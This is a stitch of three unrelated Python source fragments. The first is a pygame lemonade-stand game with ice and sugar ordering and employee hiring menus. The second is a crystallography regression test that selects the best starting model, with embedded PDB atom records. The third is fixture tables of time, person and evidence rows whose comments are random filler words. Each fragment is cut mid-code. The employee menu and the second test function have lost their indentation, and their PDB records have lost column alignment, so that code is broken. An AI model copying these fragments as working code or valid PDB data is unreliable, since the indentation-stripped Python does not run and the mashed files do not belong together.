            buttons[index*2+1] = button(screen, '+', (0,0,0,100), (0,0,0,255), button_coords[2], font, click)
            index += 1
        place_order = button(screen, 'Place Order', (0,0,0,100), (0,0,0,255), (50,500,300,50), font, click)
        return_to_inventory = button(screen, 'Back', (0,0,0,100), (0,0,0,255), (400,500,300,50), font, click)
        if click:
            # odd indices are '+', even indices are '-'; clamp to [min,max]
            for i in range(len(buttons)):
                if buttons[i]:
                    if i % 2 != 0:
                        if order_amounts[int(i/2)] == amounts_max:
                            pass
                        else:
                            order_amounts[int(i/2)] +=1
                    else:
                        if order_amounts[int((i+1)/2)] == amounts_min:
                            pass
                        else:
                            order_amounts[int((i+1)/2)] -=1
            if place_order:
                #Calculate cost
                total_cost = 0
                for i in range(len(order_amounts)):
                    total_cost += order_amounts[i]*prices[i]
                print(total_cost)  # debug output
                #Check for enough cash
                if total_cost <= lemonade_stand.account_balance:
                    order_message = 'Order Placed'
                    # queue one Order per unit of each selected row
                    index = 0
                    for order in possible_orders:
                        if order_amounts[index] != 0:
                            order_num = 0
                            while order_num < order_amounts[index]:
                                sugar_order = Order(order_dt=lemonade_game.current_datetime, delivery_dt=lemonade_game.current_datetime+timedelta(hours=order[1]), amount=order[0])
                                lemonade_stand.sugarstock.add_order(sugar_order)
                                order_num += 1
                        index += 1
                    #Pay
                    lemonade_stand.account_balance -= total_cost
                else:
                    order_message = 'Order too expensive'
            if return_to_inventory:
                done = True
            # consume the click so it is handled exactly once
            click = False
        screen.blit(font.render(order_message, 1, (0,0,0)), [10,380])
        pygame.display.update()
        #Events
        for event in pygame.event.get():
            # Close button clicked
            if event.type == pygame.QUIT:
                done = True
            if event.type == pygame.MOUSEBUTTONDOWN:
                # left mouse button pressed
                if event.button == 1:
                    click = True
            if event.type == pygame.KEYDOWN:
                # Escape key pressed
                if event.key == pygame.K_ESCAPE:
                    done = True
def ice_order_menu(lemonade_game):
    """Modal pygame screen for ordering ice.

    Same frame loop as the lemon/sugar order menus: queues Order objects
    on lemonade_stand.icestock and deducts the total cost from
    account_balance. Note that ice is currently free (price hard-coded
    to 0 below).
    """
    screen = lemonade_game.screen
    background = create_menu_background(screen)
    order_ice_image = pygame.image.load('./resources/background.png')
    order_message = ''
    #(amount, time(hrs))
    possible_orders = [(50,4),(100,8),(200,10),(500,12)]
    # per-row quantities selected with the -/+ buttons
    order_amounts = [0] * len(possible_orders)
    lemonade_stand = lemonade_game.lemonade_stand
    done = False
    click = False
    while not done:
        screen.blit(background, (0,0))
        screen.blit(order_ice_image, (0,0))
        font = pygame.font.Font(FONT_STYLE,15)
        draw_text('Order Ice', font, (255, 255, 255), screen, 20, 20)
        draw_text('Quantity [units]', font, (255, 255, 255), screen, 20, 70)
        draw_text('Arrives In', font, (255, 255, 255), screen, 20+200, 70)
        draw_text('Price', font, (255, 255, 255), screen, 20+400, 70)
        draw_text('Order', font, (255, 255, 255), screen, 20+600, 70)
        #Implement menu to order from, times in hours
        amounts_min = 0
        amounts_max = 10
        index = 0
        starting_x = 20
        starting_y = 100
        button_dimension = 25
        # buttons holds the [-,+] pair per order row; rebuilt every frame
        buttons = [False] *2*len(possible_orders)
        prices = []
        for order in possible_orders:
            item_name_x = starting_x
            item_name_y = starting_y + index*50
            # ice has no pricing model yet -- always 0
            ice_price = 0
            prices.append(ice_price)
            button_coords = [(item_name_x+600, item_name_y, button_dimension, button_dimension),
                             (item_name_x+640, item_name_y, button_dimension, button_dimension),
                             (item_name_x+680, item_name_y, button_dimension, button_dimension)]
            draw_text(str(order[0]), font, (255, 255, 255), screen , item_name_x, item_name_y)
            draw_text(str(order[1])+' HR', font, (255, 255, 255), screen , item_name_x+200, item_name_y)
            draw_text(str(ice_price), font, (255, 255, 255), screen , item_name_x+400, item_name_y)
            buttons[index*2] = button(screen, '-', (0,0,0,100), (0,0,0,255), button_coords[0], font, click)
            # middle "button" only displays the current quantity
            button(screen, str(order_amounts[index]), (0,0,0,0), (0,0,0,0), button_coords[1], font, click)
            buttons[index*2+1] = button(screen, '+', (0,0,0,100), (0,0,0,255), button_coords[2], font, click)
            index += 1
        place_order = button(screen, 'Place Order', (0,0,0,100), (0,0,0,255), (50,500,300,50), font, click)
        return_to_inventory = button(screen, 'Back', (0,0,0,100), (0,0,0,255), (400,500,300,50), font, click)
        if click:
            # odd indices are '+', even indices are '-'; clamp to [min,max]
            for i in range(len(buttons)):
                if buttons[i]:
                    if i % 2 != 0:
                        if order_amounts[int(i/2)] == amounts_max:
                            pass
                        else:
                            order_amounts[int(i/2)] +=1
                    else:
                        if order_amounts[int((i+1)/2)] == amounts_min:
                            pass
                        else:
                            order_amounts[int((i+1)/2)] -=1
            if place_order:
                #Calculate cost
                total_cost = 0
                for i in range(len(order_amounts)):
                    total_cost += order_amounts[i]*prices[i]
                print(total_cost)  # debug output
                #Check for enough cash
                if total_cost <= lemonade_stand.account_balance:
                    order_message = 'Order Placed'
                    # queue one Order per unit of each selected row
                    index = 0
                    for order in possible_orders:
                        if order_amounts[index] != 0:
                            order_num = 0
                            while order_num < order_amounts[index]:
                                ice_order = Order(order_dt=lemonade_game.current_datetime, delivery_dt=lemonade_game.current_datetime+timedelta(hours=order[1]), amount=order[0])
                                lemonade_stand.icestock.add_order(ice_order)
                                order_num += 1
                        index += 1
                    #Pay
                    lemonade_stand.account_balance -= total_cost
                else:
                    order_message = 'Order too expensive'
            if return_to_inventory:
                done = True
            # consume the click so it is handled exactly once
            click = False
        screen.blit(font.render(order_message, 1, (0,0,0)), [10,380])
        pygame.display.update()
        #Events
        for event in pygame.event.get():
            # Close button clicked
            if event.type == pygame.QUIT:
                done = True
            if event.type == pygame.MOUSEBUTTONDOWN:
                # left mouse button pressed
                if event.button == 1:
                    click = True
            if event.type == pygame.KEYDOWN:
                # Escape key pressed
                if event.key == pygame.K_ESCAPE:
                    done = True
def employee_menu(lemonade_game):
screen = lemonade_game.screen
background = create_menu_background(screen)
employee_image = pygame.image.load('./resources/background.png')
lemonade_stand = lemonade_game.lemonade_stand
wages = [20, 30, 40]
done = False
click = False
while not done:
current_employees = lemonade_stand.get_current_employees() #Get employees
employee_count = [0, 0, 0]
for employee in current_employees:
if employee.get_daily_wage() == wages[0]:
employee_count[0] += 1
elif employee.get_daily_wage() == wages[1]:
employee_count[1] += 1
else:
employee_count[2] += 1
screen.blit(background, (0,0))
screen.blit(employee_image, (0,0))
font = pygame.font.Font(FONT_STYLE,15) #Edit fonts here
draw_text('Current Staff', font, (255, 255, 255), screen, 20, 20)
#Try to make this into a loop through different employee wage
buttons = [False]*len(wages)*2
index = 0
x_start, y_start = 20, 100
button_h, button_w = 75, 25
spacing = 100
for i in range(len(wages)):
item_name_x = x_start
item_name_y = y_start + index*spacing #Next line is 30 down
item_display = str(employee_count[i]) + ' employees paid at '+ str(wages[i]) + ' $/day'#+ ', quantity ordered:' + str(round(value))
draw_text(item_display, font, (255, 255, 255), screen , item_name_x, item_name_y)
buttons[index*2] = button(screen, 'Fire', (0,0,0,100), (0,0,0,255), (item_name_x+290,item_name_y+25,button_h,button_w), font, click)
buttons[index*2+1] = button(screen, 'Hire', (0,0,0,100), (0,0,0,255), (item_name_x+390,item_name_y+25,button_h,button_w), font, click)
index += 1
#Buttons to accept recipe and return to game
return_to_game = button(screen, 'Resume Game', (0,0,0,100), (0,0,0,255), (400,500,300,50), font, click)
if click:
for i in range(len(buttons)):
if buttons[i]:
if i % 2 == 0:
lemonade_stand.fire_employee(lemonade_stand.employee_image_dict,lemonade_game.current_datetime.time(),wages[int(i/2)])
else:
lemonade_stand.hire_employee(lemonade_stand.opening_time,lemonade_stand.closing_time,lemonade_stand.employee_image_dict,lemonade_game.current_datetime.time(),wages[int((i-1)/2)])
if return_to_game:
done = True
click = False
pygame.display.update()
#Events
for | |
from __future__ import division
from libtbx.test_utils import Exception_expected
from libtbx.utils import null_out, Sorry
from libtbx import easy_run
def exercise_main():
  """Regression test for select_best_starting_model.select_model.

  Builds a reference structure, simulates data with phenix.fmodel, then
  writes five variant models (shifted, mainchain-only, wrong symmetry,
  shaken, missing CRYST1) and checks which one is selected with and
  without rigid-body refinement.
  """
  from mmtbx.refinement import select_best_starting_model
  from iotbx import file_reader
  from cctbx import uctbx
  from cctbx import sgtbx
  from scitbx.array_family import flex
  import random
  # (unused below; kept for reference of the nominal symmetry)
  unit_cell = (24.937, 8.866, 25.477, 90.00, 107.08, 90.00)
  space_group = "P21"
  pdb_base = """\
CRYST1   24.937    8.866   25.477  90.00 107.08  90.00 P 1 21 1
SCALE1      0.040101  0.000000  0.012321        0.00000
SCALE2      0.000000  0.112790  0.000000        0.00000
SCALE3      0.000000  0.000000  0.041062        0.00000
ATOM      1  N   GLY A   1       8.992   0.474  -6.096  1.00 16.23           N
ATOM      2  CA  GLY A   1       9.033   0.047  -4.707  1.00 16.20           C
ATOM      3  C   GLY A   1       7.998  -1.029  -4.448  1.00 15.91           C
ATOM      4  O   GLY A   1       7.548  -1.689  -5.385  1.00 16.11           O
ATOM      5  N   ASN A   2       7.625  -1.218  -3.185  1.00 15.02           N
ATOM      6  CA  ASN A   2       6.523  -2.113  -2.848  1.00 13.92           C
ATOM      7  C   ASN A   2       5.220  -1.618  -3.428  1.00 12.24           C
ATOM      8  O   ASN A   2       4.955  -0.418  -3.432  1.00 11.42           O
ATOM      9  CB  ASN A   2       6.376  -2.261  -1.340  1.00 14.42           C
ATOM     10  CG  ASN A   2       7.620  -2.786  -0.697  1.00 13.92           C
ATOM     11  OD1 ASN A   2       8.042  -3.915  -0.978  1.00 14.39           O
ATOM     12  ND2 ASN A   2       8.232  -1.975   0.168  1.00 12.78           N
ATOM     13  N   ASN A   3       4.406  -2.553  -3.904  1.00 12.20           N
ATOM     14  CA  ASN A   3       3.164  -2.226  -4.594  1.00 11.81           C
ATOM     15  C   ASN A   3       1.925  -2.790  -3.910  1.00 10.59           C
ATOM     16  O   ASN A   3       1.838  -3.991  -3.653  1.00 10.32           O
ATOM     17  CB  ASN A   3       3.231  -2.727  -6.046  1.00 12.51           C
ATOM     18  CG  ASN A   3       1.973  -2.405  -6.848  1.00 12.59           C
ATOM     19  OD1 ASN A   3       1.662  -1.239  -7.106  1.00 13.64           O
ATOM     20  ND2 ASN A   3       1.260  -3.443  -7.268  1.00 12.39           N
ATOM     21  N   GLN A   4       0.973  -1.913  -3.608  1.00 10.34           N
ATOM     22  CA  GLN A   4      -0.366  -2.335  -3.208  1.00 10.00           C
ATOM     23  C   GLN A   4      -1.402  -1.637  -4.085  1.00 10.21           C
ATOM     24  O   GLN A   4      -1.514  -0.414  -4.070  1.00  8.99           O
ATOM     25  CB  GLN A   4      -0.656  -2.027  -1.736  1.00 10.00           C
ATOM     26  CG  GLN A   4      -1.927  -2.705  -1.229  1.00 10.50           C
ATOM     27  CD  GLN A   4      -2.482  -2.102   0.060  1.00 11.36           C
ATOM     28  OE1 GLN A   4      -2.744  -0.900   0.151  1.00 12.29           O
ATOM     29  NE2 GLN A   4      -2.684  -2.951   1.055  1.00 10.43           N
ATOM     30  N   GLN A   5      -2.154  -2.406  -4.857  1.00 10.48           N
ATOM     31  CA  GLN A   5      -3.247  -1.829  -5.630  1.00 11.24           C
ATOM     32  C   GLN A   5      -4.591  -2.382  -5.178  1.00 11.40           C
ATOM     33  O   GLN A   5      -4.789  -3.599  -5.092  1.00 11.94           O
ATOM     34  CB  GLN A   5      -3.024  -2.023  -7.129  1.00 11.14           C
ATOM     35  CG  GLN A   5      -1.852  -1.222  -7.653  1.00 10.65           C
ATOM     36  CD  GLN A   5      -1.338  -1.748  -8.965  1.00 10.73           C
ATOM     37  OE1 GLN A   5      -0.794  -2.845  -9.028  1.00 10.14           O
ATOM     38  NE2 GLN A   5      -1.511  -0.968 -10.027  1.00 11.31           N
ATOM     39  N   ASN A   6      -5.504  -1.471  -4.872  1.00 11.56           N
ATOM     40  CA  ASN A   6      -6.809  -1.838  -4.359  1.00 12.07           C
ATOM     41  C   ASN A   6      -7.856  -1.407  -5.353  1.00 13.18           C
ATOM     42  O   ASN A   6      -8.257  -0.251  -5.362  1.00 13.64           O
ATOM     43  CB  ASN A   6      -7.053  -1.149  -3.017  1.00 12.12           C
ATOM     44  CG  ASN A   6      -5.966  -1.446  -1.998  1.00 12.31           C
ATOM     45  OD1 ASN A   6      -5.833  -2.579  -1.517  1.00 13.43           O
ATOM     46  ND2 ASN A   6      -5.198  -0.423  -1.645  1.00 11.88           N
ATOM     47  N   TYR A   7      -8.298  -2.332  -6.193  1.00 14.34           N
ATOM     48  CA  TYR A   7      -9.162  -1.980  -7.317  1.00 15.00           C
ATOM     49  C   TYR A   7     -10.603  -1.792  -6.893  1.00 15.64           C
ATOM     50  O   TYR A   7     -11.013  -2.278  -5.838  1.00 15.68           O
ATOM     51  CB  TYR A   7      -9.064  -3.041  -8.412  1.00 15.31           C
ATOM     52  CG  TYR A   7      -7.657  -3.197  -8.931  1.00 15.06           C
ATOM     53  CD1 TYR A   7      -6.785  -4.118  -8.368  1.00 15.24           C
ATOM     54  CD2 TYR A   7      -7.193  -2.400  -9.960  1.00 14.96           C
ATOM     55  CE1 TYR A   7      -5.489  -4.253  -8.830  1.00 14.94           C
ATOM     56  CE2 TYR A   7      -5.905  -2.526 -10.429  1.00 15.13           C
ATOM     57  CZ  TYR A   7      -5.055  -3.451  -9.861  1.00 14.97           C
ATOM     58  OH  TYR A   7      -3.768  -3.572 -10.335  1.00 14.93           O
ATOM     59  OXT TYR A   7     -11.378  -1.149  -7.601  1.00 15.89           O
TER
"""
  pdb_base_water = """\
HETATM   64  O   HOH S   1     -10.466  -2.347  -3.168  1.00 17.57           O
HETATM   65  O   HOH S   2       6.469   1.081  -7.070  1.00 21.27           O
HETATM   66  O   HOH S   3     -11.809   0.108  -9.956  1.00 27.52           O
HETATM   67  O   HOH S   4       1.580  -3.455 -11.035  1.00 44.76           O
END
"""
  # NOTE(review): files are opened without explicit close throughout;
  # relies on CPython refcounting to flush
  open("tst_start_model_base.pdb", "w").write(pdb_base+pdb_base_water)
  # phenix.fmodel input: simulate 1.75 A amplitudes from the base model
  params = """
high_resolution = 1.75
add_sigmas = True
pdb_file = tst_start_model_base.pdb
output {
  label = F
  type = *real complex
  file_name = tst_start_model_base.mtz
}
"""
  open("tst_start_model_fmodel.eff", "w").write(params)
  assert (easy_run.fully_buffered(
    "phenix.fmodel tst_start_model_fmodel.eff"
  ).raise_if_errors().return_code == 0)
  mtz_in = file_reader.any_file("tst_start_model_base.mtz")
  f_obs = mtz_in.file_server.miller_arrays[0]
  # relabel the data with P2 symmetry to exercise symmetry handling
  symm = f_obs.crystal_symmetry().customized_copy(
    space_group_info=sgtbx.space_group_info("P2"))
  f_obs = f_obs.customized_copy(crystal_symmetry=symm)
  random.seed(12345) # XXX makes results more predictable
  flags = f_obs.generate_r_free_flags(fraction=0.1)
  mtz_data = f_obs.as_mtz_dataset(
    column_root_label="F")
  mtz_data.add_miller_array(flags,
    column_root_label="FreeR_flag")
  mtz_data.mtz_object().write("tst_start_model.mtz")
  pdb_in = file_reader.any_file("tst_start_model_base.pdb")
  hierarchy_in = pdb_in.file_object.hierarchy
  xrs_in = pdb_in.file_object.xray_structure_simple()
  selection = hierarchy_in.atom_selection_cache().selection
  # Model 1: very few changes, but shifted by (1,0,0.5)
  symm2 = xrs_in.crystal_symmetry().customized_copy(
    unit_cell=uctbx.unit_cell((24.932, 8.841, 25.501, 90.00, 107.5, 90.00)))
  #u_iso = xrs_in.extract_u_iso_or_u_equiv()
  #xrs_out = xrs_in.deep_copy_scatterers().set_u_iso(
  #  selection=flex.bool(u_iso.size(), True), values=u_iso*1.1)
  xrs_out = xrs_in.deep_copy_scatterers()
  sites_cart = xrs_out.sites_cart()
  sites_cart += flex.vec3_double(sites_cart.size(), (1.0, 0.0, 0.5))
  xrs_out.set_sites_cart(sites_cart)
  hierarchy_out = hierarchy_in.deep_copy()
  hierarchy_out.adopt_xray_structure(xrs_out)
  open("tst_start_model_1.pdb", "w").write(
    hierarchy_out.as_pdb_string(crystal_symmetry=symm2))
  # Model 2: no sidechains
  mc_sele = selection("(name N or name C or name O or name CA or name CB)")
  hierarchy_out = hierarchy_in.select(mc_sele)
  xrs_out = xrs_in.select(mc_sele)
  open("tst_start_model_2.pdb", "w").write(
    hierarchy_out.as_pdb_string(crystal_symmetry=xrs_out))
  # Model 3: P1 symmetry
  symm3 = xrs_in.crystal_symmetry().customized_copy(
    space_group_info=sgtbx.space_group_info("P1"))
  open("tst_start_model_3.pdb", "w").write(
    hierarchy_out.as_pdb_string(crystal_symmetry=symm3))
  # Model 4: shaken coordinates and ADPs
  def random_double(size, factor=1):
    # deterministic replacement driven by the seeded 'random' module
    d = flex.double()
    for x in range(size):
      d.append(random.random() * factor)
    return d
  xrs_out = xrs_in.customized_copy()
  xrs_out.shake_sites_in_place(0.3, random_double=random_double)
  xrs_out.shake_adp()
  hierarchy_out = hierarchy_in.deep_copy()
  hierarchy_out.adopt_xray_structure(xrs_out)
  open("tst_start_model_4.pdb", "w").write(
    hierarchy_out.as_pdb_string(crystal_symmetry=xrs_out))
  # Model 5: perfect, but missing CRYST1
  open("tst_start_model_5.pdb", "w").write(hierarchy_in.as_pdb_string())
  # run the selection without rigid-body refinement
  params = select_best_starting_model.master_phil.extract()
  params.rigid_body_refine = False
  model_names = [
    "tst_start_model_1.pdb",
    "tst_start_model_2.pdb",
    "tst_start_model_3.pdb",
    "tst_start_model_4.pdb",
    "tst_start_model_5.pdb",
  ]
  result = select_best_starting_model.select_model(
    model_names=model_names,
    model_data=None,
    f_obs=f_obs,
    r_free_flags=flags,
    params=params,
    skip_twin_detection=True,
    log=null_out())
  # result.show(verbose=True)
  assert (result.best_model_name == "tst_start_model_4.pdb"), result.best_model_name
  # with rigid-body refinement the shifted model 1 should win instead
  params.rigid_body_refine = True
  result = select_best_starting_model.select_model(
    model_names=model_names,
    model_data=None,
    f_obs=f_obs,
    r_free_flags=flags,
    params=params,
    skip_twin_detection=True,
    log=null_out())
  # result.show(verbose=True)
  assert (result.best_model_name == "tst_start_model_1.pdb"), result.best_model_name
def exercise_misc():
from mmtbx.refinement import select_best_starting_model
from iotbx import file_reader
import iotbx.pdb.hierarchy
pdb_str = """\
REMARK this is a remark record!
CRYST1 21.937 4.866 23.477 90.00 107.08 90.00 P 1 21 1
SCALE1 0.045585 0.000000 0.014006 0.00000
SCALE2 0.000000 0.205508 0.000000 0.00000
SCALE3 0.000000 0.000000 0.044560 0.00000
ATOM 1 N GLY A 1 -9.009 4.612 6.102 0.00 16.77 N
ATOM 2 CA GLY A 1 -9.052 4.207 4.651 0.00 16.57 C
ATOM 3 C GLY A 1 -8.015 3.140 4.419 0.00 16.16 C
ATOM 4 O GLY A 1 -7.523 2.521 5.381 0.00 16.78 O
ATOM 5 H1 GLY A 1 -9.802 4.938 6.343 0.00 16.77 H
ATOM 6 H2 GLY A 1 -8.816 3.902 6.603 0.00 16.77 H
ATOM 7 H3 GLY A 1 -8.385 5.236 6.218 0.00 16.77 H
ATOM 8 HA2 GLY A 1 -9.928 3.856 4.426 0.00 16.57 H
ATOM 9 HA3 GLY A 1 -8.858 4.970 4.084 0.00 16.57 H
ATOM 10 N ASN A 2 -7.656 2.923 3.155 1.00 15.02 N
ATOM 11 CA ASN A 2 -6.522 2.038 2.831 1.00 14.10 C
ATOM 12 C ASN A 2 -5.241 2.537 3.427 1.00 13.13 C
ATOM 13 O ASN A 2 -4.978 3.742 3.426 1.00 11.91 O
ATOM 14 CB ASN A 2 -6.346 1.881 1.341 1.00 15.38 C
ATOM 15 CG ASN A 2 -7.584 1.342 0.692 1.00 14.08 C
ATOM 16 OD1 ASN A 2 -8.025 0.227 1.016 1.00 17.46 O
ATOM 17 ND2 ASN A 2 -8.204 2.155 -0.169 1.00 11.72 N
ATOM 18 H ASN A 2 -8.044 3.269 2.470 1.00 15.02 H
ATOM 19 HA ASN | |
None),
TimeGroup(9, None),
TimeGroup(10, None),
TimeGroup(11, 21),
TimeGroup(12, None),
TimeGroup(13, 22),
TimeGroup(14, None),
TimeGroup(15, None),
TimeGroup(16, None),
TimeGroup(17, 23),
TimeGroup(18, None),
TimeGroup(19, None),
TimeGroup(20, None),
TimeGroup(21, None),
TimeGroup(22, None),
TimeGroup(23, None),
TimeGroup(24, 24),
TimeGroup(25, None),
TimeGroup(26, None),
]
# }}}
TimeInstance = namedtuple('time_instance', ['id', 'time_group_id', 'span', 'confidence', 'comment'])# {{{
# Fixture rows attaching a date range to a time group.
# ``span`` looks like a PostgreSQL int4range literal ('[lo,hi)', an omitted
# bound meaning unbounded, or 'empty') — TODO confirm against the consumer.
# ``confidence`` is one of 'certain'/'probable'/'uncertain'/'contested'/
# 'false' or None; ``comment`` is free text or None.
time_instance_table = [
    TimeInstance(1, 1, '[1679,1784)', 'uncertain', None),
    TimeInstance(2, 1, '[626,)', 'certain', None),
    TimeInstance(3, 1, '[1640,1850)', 'certain', None),
    TimeInstance(4, 1, '[1311,)', 'false', 'workshops mired designated'),
    TimeInstance(5, 2, '[,925)', 'false', None),
    TimeInstance(6, 2, '[1798,)', None, None),
    TimeInstance(7, 2, 'empty', 'contested', None),
    TimeInstance(8, 2, '[849,1294)', 'false', None),
    TimeInstance(9, 3, '[,1609)', 'contested', None),
    TimeInstance(10, 3, '[1277,1493)', 'uncertain', None),
    TimeInstance(11, 3, '[1415,1889)', 'uncertain', 'registering temples paragon hawkwind scrapper extractors'),
    TimeInstance(12, 3, '[201,1529)', None, 'testdata'),
    TimeInstance(13, 4, '[865,1367)', 'false', 'cottage clocker catherin'),
    TimeInstance(14, 4, '[1031,1869)', 'contested', None),
    TimeInstance(15, 4, '[,1649)', 'uncertain', None),
    TimeInstance(16, 4, '[1021,1242)', 'false', None),
    TimeInstance(17, 5, '[432,906)', 'certain', None),
    TimeInstance(18, 6, '[1666,)', 'certain', None),
    TimeInstance(19, 6, '[960,1566)', 'uncertain', 'apparitions jabs methanol accredit deliverable configurable'),
    TimeInstance(20, 6, '[1203,1598)', 'uncertain', 'fried eggs'),
    TimeInstance(21, 7, '[1598,1680)', 'certain', 'interconnected'),
    TimeInstance(22, 7, '[463,1404)', 'false', None),
    TimeInstance(23, 7, '[1888,)', 'certain', 'benchmarks'),
    TimeInstance(24, 7, '[278,1077)', 'probable', None),
    TimeInstance(25, 9, '[825,1851)', 'contested', None),
    TimeInstance(26, 9, '[,1257)', 'false', None),
    TimeInstance(27, 9, '[,1969)', 'certain', 'receptive cursory'),
    TimeInstance(28, 9, '[1122,)', 'uncertain', None),
    TimeInstance(29, 10, '[1822,1835)', 'contested', None),
    TimeInstance(30, 10, '[905,1106)', None, ''),
    TimeInstance(31, 10, '[890,)', 'false', 'sdmf sdg '),
    TimeInstance(32, 12, '[1273,1476)', None, 'confirmations delineate filtrate blitzs bizkit shes'),
    TimeInstance(33, 12, '[269,684)', 'false', 'prerogatives'),
    TimeInstance(34, 13, 'empty', 'false', 'siderite palmed jaws shorting partridges'),
    TimeInstance(35, 13, '[,690)', 'probable', 'trappings fittings casteth sheehan software forges delving'),
    TimeInstance(36, 13, '[442,596)', 'certain', 'radiochemical invective permit presumptions whitehorse holocene'),
    TimeInstance(37, 13, '[1473,1673)', 'certain', 'dried plums'),
    TimeInstance(38, 14, '[954,1530)', None, 'beaters downpour reevaluating spangle trundle hes slops'),
    TimeInstance(39, 14, '[1391,)', 'contested', None),
    TimeInstance(40, 14, '[428,775)', 'probable', None),
    TimeInstance(41, 15, '[593,755)', 'contested', 'surroundings merriment roof forbes sermon sported'),
    TimeInstance(42, 15, '[1543,)', 'contested', 'trachea evoking flair competitors brainstems victor initialed'),
    TimeInstance(43, 15, '[789,1132)', 'contested', None),
    TimeInstance(44, 15, '[659,1865)', None, 'property'),
    TimeInstance(45, 15, '[1710,)', 'certain', None),
    TimeInstance(46, 15, '[1729,)', 'certain', 'idling communicates deify necromancer aqua'),
    TimeInstance(47, 21, '[1371,1808)', 'false', 'juan churchyard asymptotes landings winifred flooring'),
    TimeInstance(48, 22, '[329,673)', 'probable', None),
    TimeInstance(49, 23, '[,1478)', 'contested', None),
    TimeInstance(50, 24, '[449,893)', 'uncertain', None),
    TimeInstance(51, 25, '[1572,1573)', 'uncertain', None),
]
# }}}
PersonType = namedtuple('person_type', ['id', 'type'])  # {{{
# A single person type is enough for these fixtures.
person_type_table = [PersonType(1, 'Person type 1')]
# }}}
Person = namedtuple('person', ['id', 'name', 'time_range', 'comment', 'person_type'])# {{{
# Fixture rows.  Note that ids 6 and 7 deliberately share the name
# 'Person 6' (told apart by time_range) and that every row uses
# person_type 1 — the only type defined in person_type_table.
person_table = [
    Person(1, 'Person 1', '', 'comment 1', 1),
    Person(2, 'Person 2', '', 'comment 2', 1),
    Person(3, 'Person 3', '5th century', 'comment 3', 1),
    Person(4, 'Person 4', '519-572', None, 1),
    Person(5, 'Person 5', '', 'comment 5', 1),
    Person(6, 'Person 6', 'first of his name', 'comment 6', 1),
    Person(7, 'Person 6', 'second of his name', None, 1),
    Person(8, 'Person 8', '', None, 1),
    Person(9, 'Person 9', '14th century', 'comment 9', 1),
    Person(10, 'Person 10', 'last decade of the 15th century', 'comment 10', 1),
]
# }}}
PersonInstance = namedtuple('person_instance', ['id', 'person_id', 'annotation_id', 'confidence', 'comment'])# {{{
# Fixture rows linking persons to optional annotations; ``annotation_id``
# is mostly None (annotations 25-32 are referenced where present) and
# ``confidence`` may be None as well.
person_instance_table = [
    PersonInstance(1, 1, None, 'probable', 'comment 1'),
    PersonInstance(2, 2, None, 'certain', 'comment 2'),
    PersonInstance(3, 3, 25, None, 'comment 3'),
    PersonInstance(4, 4, None, 'false', None),
    PersonInstance(5, 5, 26, None, 'comment 5'),
    PersonInstance(6, 6, 27, 'probable', 'comment 6'),
    PersonInstance(7, 7, None, 'uncertain', None),
    PersonInstance(8, 8, None, 'false', None),
    PersonInstance(9, 8, 28, 'contested', 'comment 9'),
    PersonInstance(10, 8, None, 'uncertain', 'comment 10'),
    PersonInstance(11, 1, None, None, None),
    PersonInstance(12, 2, 29, 'probable', 'comment 12'),
    PersonInstance(13, 3, None, 'false', 'comment 13'),
    PersonInstance(14, 4, None, 'contested', 'comment 14'),
    PersonInstance(15, 5, None, 'uncertain', 'comment 15'),
    PersonInstance(16, 6, None, None, 'comment 16'),
    PersonInstance(17, 7, None, 'probable', None),
    PersonInstance(18, 8, 30, 'false', 'comment 18'),
    PersonInstance(19, 8, None, 'contested', 'comment 19'),
    PersonInstance(20, 1, None, 'probable', 'comment 20'),
    PersonInstance(21, 4, 31, None, 'comment 21'),
    PersonInstance(22, 5, None, None, None),
    PersonInstance(23, 7, None, 'uncertain', 'comment 23'),
    PersonInstance(24, 8, None, 'contested', None),
    PersonInstance(25, 7, 32, 'uncertain', 'comment 25'),
]
# }}}
Evidence = namedtuple('evidence', ['id', 'place_instance_id', 'time_group_id', 'religion_instance_id', 'person_instance_id', 'interpretation_confidence', 'visible', 'comment'])# {{{
# Fixture rows joining place/time/religion/person instances into one piece
# of evidence.  Rows 26-29 repeat the ids of row 20; rows 27 and 28 appear
# to probe NULL foreign keys (no person / no time group) — verify intent
# against the tests that consume this table.
evidence_table = [
    Evidence(1, 1, 1, 1, 1, None, True, 'zapper footing slippery blondes'),
    Evidence(2, 2, 2, 2, 2, 'contested', True, None),
    Evidence(3, 3, 3, 3, 3, 'uncertain', False, 'maidservant amulet postmen'),
    Evidence(4, 4, 4, 4, 4, 'contested', True, 'pansys shagbark technologist reinstating airstrips chopped'),
    Evidence(5, 5, 5, 5, 5, 'uncertain', True, None),
    Evidence(6, 6, 6, 6, 6, None, False, 'speculator scirocco crafts scull dished streamliner unnoticed'),
    Evidence(7, 7, 7, 7, 7, 'contested', True, 'sicker smokin graduates herpes patently'),
    Evidence(8, 8, 8, 8, 8, 'uncertain', False, 'phialpha redstart divans ethical laidlaw truants'),
    Evidence(9, 9, 9, 9, 9, 'false', False, 'reorder ownership weighing averted snuff'),
    Evidence(10, 10, 10, 10, 10, None, False, 'biconnected nonspecialists bootlegs perchlorate uncompromising ferreira chinaman'),
    Evidence(11, 11, 11, 11, 11, 'probable', False, 'livre wailed tarheel revving attuning'),
    Evidence(12, 12, 12, 12, 12, 'certain', False, 'guidebooks fireplaces abscond'),
    Evidence(13, 13, 13, 13, 13, None, True, None),
    Evidence(14, 14, 14, 14, 14, 'contested', False, 'spaceman gareth secretaries hera'),
    Evidence(15, 15, 15, 15, 15, 'false', True, 'missiles antipodes hawker horseflesh'),
    Evidence(16, 16, 16, 16, 16, 'uncertain', True, 'anisotropy'),
    Evidence(17, 17, 17, 17, 17, 'false', False, None),
    Evidence(18, 18, 18, 18, 18, 'contested', True, 'confiscations fleshes phon boron cowry bases'),
    Evidence(19, 19, 19, 19, 19, 'contested', False, 'everlastingly reverent worktable stimulants readies leak guyer'),
    Evidence(20, 20, 20, 20, 20, 'probable', True, 'fortin anise chattel longitude gayer perpendicular'),
    Evidence(21, 1, 1, 1, 1, 'false', False, 'test comment'),
    Evidence(22, 1, 2, 2, 3, 'uncertain', False, None),
    Evidence(23, 1, 3, 3, 4, 'probable', True, None),
    Evidence(24, 1, 4, 4, 5, 'probable', True, 'icicle reformulating shell carob burglar matriculation log feigned'),
    Evidence(25, 1, 5, 5, 6, 'contested', True, None),
    Evidence(26, 20, 20, 20, 20, 'contested', True, None),
    Evidence(27, 20, 20, 20, None, 'contested', True, None),
    Evidence(28, 20, None, 20, 20, 'contested', True, None),
    Evidence(29, 20, 20, 20, 20, 'contested', True, None),
]
# }}}
Language = namedtuple('language', ['id', 'name'])  # {{{
# Twelve sequentially numbered languages, 'Language 1' .. 'Language 12'.
